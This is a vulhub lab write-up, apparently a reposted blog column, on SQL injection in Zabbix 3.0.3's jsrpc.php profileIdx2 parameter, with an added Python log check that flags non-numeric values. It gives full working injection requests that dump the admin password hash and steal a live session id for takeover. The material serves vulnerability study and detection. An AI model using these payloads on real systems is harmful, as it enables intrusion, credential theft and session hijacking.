Vulnerability overview:
Zabbix is a server monitoring product made up of server, agent and web modules. The web module is written in PHP and displays the results stored in the database.
Lab environment:
In vulhub, run the following command to start Zabbix 3.0.3:
docker-compose up -d
After the command runs, it starts the database (MySQL), zabbix server, zabbix agent and zabbix web. On a machine with little memory one of the containers may die; check container status with docker-compose ps and restart a stopped container with docker-compose start.
Reproduction
1. Here I trigger the vulnerability through the jsrpc.php page. Sending the following request shows that the profileIdx2 parameter is subject to SQL injection:
GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0) HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: zbx_sessionid=7689b1e30e63d9726fa86010d3c6592c; PHPSESSID=3r69f0snsemtpmkeiocgg9blj2
Upgrade-Insecure-Requests: 1
2. The response shows that the injection exists and the injected SQL was executed.
3. We can then go further and use the injection to retrieve the admin user's password:
GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) HTTP/1.1
Host: 192.168.20.129:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: zbx_sessionid=0d01a6ed6433f8453fa9ba4cad4e7721; PHPSESSID=62hs5tn5o67q8u2q7nc2cm1hk7
Upgrade-Insecure-Requests: 1
4. Retrieve the MD5 password hash and crack it.
5. After that you can log in to the admin backend.
6. We can also use the injection to retrieve a session id directly and log in by swapping our own session id for it:
GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,(select%20sessionid%20from%20sessions%20limit%200,1),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1
Host: 192.168.20.129:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: zbx_sessionid=977585848ca35d41eca4cb96b55a036b; PHPSESSID=kp27a0viri5923ul6q9jkrvu80
Upgrade-Insecure-Requests: 1
7. With that session id you can log straight into the backend.
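Added example (not from the original post or from the Zabbix project): a log check that flags jsrpc.php requests whose profileIdx2 value is not a plain numeric id, which is what the requests above all have in common. It assumes a legitimate profileIdx2 is an integer id and runs over constructed Apache-style access-log lines embedded in the script.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache "common" style), not real traffic.
# Lines 2 and 3 carry a non-numeric profileIdx2 value on jsrpc.php.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Aug/2020:10:00:01 +0000] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=23415 HTTP/1.1" 200 512
10.0.0.9 - - [10/Aug/2020:10:00:07 +0000] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0) HTTP/1.1" 500 187
10.0.0.9 - - [10/Aug/2020:10:00:09 +0000] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=(select%201) HTTP/1.1" 500 187
10.0.0.5 - - [10/Aug/2020:10:00:11 +0000] "GET /dashboard.php HTTP/1.1" 200 4096
"""

# ip, ident, user, [timestamp], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Assumption: a legitimate profileIdx2 is an integer id (it selects a stored
# profile row); anything else is not a value the frontend itself would send.
NUMERIC_ID_RE = re.compile(r'^\d+$')


def is_valid_profile_idx2(value: str) -> bool:
    """Positive check: accept only a plain decimal id."""
    return NUMERIC_ID_RE.match(value) is not None


def suspicious_requests(log_text: str):
    """Return (ip, timestamp, decoded profileIdx2) for every jsrpc.php request
    whose profileIdx2 fails the numeric check (parse_qs percent-decodes)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # unparseable line: skip, do not crash
        url = urlsplit(m.group("target"))
        if url.path != "/jsrpc.php":
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("profileIdx2", []):
            if not is_valid_profile_idx2(value):
                hits.append((m.group("ip"), m.group("ts"), value))
    return hits


if __name__ == "__main__":
    for ip, ts, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ts} {ip} jsrpc.php profileIdx2={value!r}")
```

The same numeric check is the positive validation the PHP side would need on the parameter before it reaches a query.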
Author: hatjwe
Published by a 安全脉搏 (Security Pulse) column author; when reposting, please credit: https://www.secpulse.com/archives/139686.html